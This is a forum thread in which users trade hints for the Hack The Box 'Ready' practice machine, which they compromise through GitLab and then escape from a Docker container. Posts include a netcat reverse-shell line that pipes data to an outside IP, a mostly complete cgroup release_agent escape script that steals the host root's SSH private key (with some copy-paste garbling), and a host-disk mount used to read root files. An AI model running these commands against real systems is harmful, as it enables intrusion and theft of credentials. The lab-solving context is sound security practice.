TUTORIAL Ready User Part
by liveartic12 - December 12, 2020 at 10:55 PM
#25
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please, I'm going crazy !!
#26
(December 13, 2020 at 07:16 PM)Kali76 Wrote: [email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please, I'm going crazy !!

Here u go User + root 
explained detaily

If u have any issues PM me or Post ur issue below

https://raidforums.com/Thread-Tutorial-R...EASY-STEPS
#27
(December 13, 2020 at 07:24 PM)0xvijay Wrote:
(December 13, 2020 at 07:16 PM)Kali76 Wrote: [email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please, I'm going crazy !!

Here u go User + root 
explained detaily

If u have any issues PM me or Post ur issue below

https://raidforums.com/Thread-Tutorial-R...EASY-STEPS

ok thanks, there is writeup rev shell user git and root?

bro not work ...

`"cat /flag | nc 10.10.14.24 1234 -e /bin/bash"`

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:60548.
python3 -c "import pty:pty.spawn('bin/bash')";
#28
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?
#29
Nice machine.
Initially was going to solve as a laboratory, but this one even easier.
In general you need two things:
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/ - to get user
https://medium.com/better-programming/es...ae7d17f5a1 - to get root id_rsa from the host (you just need to make proper changes)
something like:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_release
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/.ssh/id_rsa > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo 0 >> /tmp/cgrp/x/cgroup.procs"

cat /output
#30
(December 13, 2020 at 08:26 PM)143kel Wrote:
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?

I used cgroups release_agent to help. Wrote the contents to /output
https://medium.com/better-programming/es...ae7d17f5a1

You can also just mount the fs. Something like:
`
df -h
mkdir /tmp/test
mount /dev/sda2 /tmp/test
cat /tmp/test/root/root.txt
`
#31
(December 13, 2020 at 10:48 PM)southerndarkness Wrote:
(December 13, 2020 at 08:26 PM)143kel Wrote:
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?

I used cgroups release_agent to help. Wrote the contents to /output
https://medium.com/better-programming/es...ae7d17f5a1

You can also just mount the fs. Something like:
`
df -h
mkdir /tmp/test
mount /dev/sda2 /tmp/test
cat /tmp/test/root/root.txt
`

Works like a champ!!
#32
cool


so there're many ways to root this xD
#33
How to capture user.txt from [email protected] please help
#34
(December 13, 2020 at 07:24 AM)southerndarkness Wrote: Just came back to this dug and found smtp_password in gitlab.rb and was able to log in as root but still no flag since we're in a container. :/
any way to break out?


EDIT: rooted. basically realize youre in a privileged container. /opt/backup/docker-compose.yml

you can then abuse cgroups release_agent to dump contents of the host fs into a file in the container,

article here: https://medium.com/better-programming/es...ae7d17f5a1

Could you PM me? I have a question pertaining to this. Thank you!

(December 13, 2020 at 10:45 PM)cbra02011980ioj Wrote: Nice machine.
Initially was going to solve as a laboratory, but this one even easier.
In general you need two things:
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/ - to get user
https://medium.com/better-programming/es...ae7d17f5a1 - to get root id_rsa from the host (you just need to make proper changes)
something like:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_release
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/.ssh/id_rsa > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo 0 >> /tmp/cgrp/x/cgroup.procs"

cat /output

How are you able to mount or use the -o or /cmd?

Am I missing something?
#35
[/quote]

How are you able to mount or use the -o or /cmd?

Am I missing something?
[/quote]
If you are root, you can do  almost whatever you want.

Possibly Related Threads…
Thread Author Replies Views Last Post
BUYING Attended root part Kali76 0 401 February 21, 2021 at 03:00 AM
Last Post: Kali76
TUTORIAL Root Part ScriptKiddie evil-winrm0779 4 1,141 February 13, 2021 at 06:12 PM
Last Post: bugbunny
TUTORIAL HTB Ready box orangutang 0 274 February 10, 2021 at 10:53 PM
Last Post: orangutang

 Users browsing this thread: 1 Guest(s)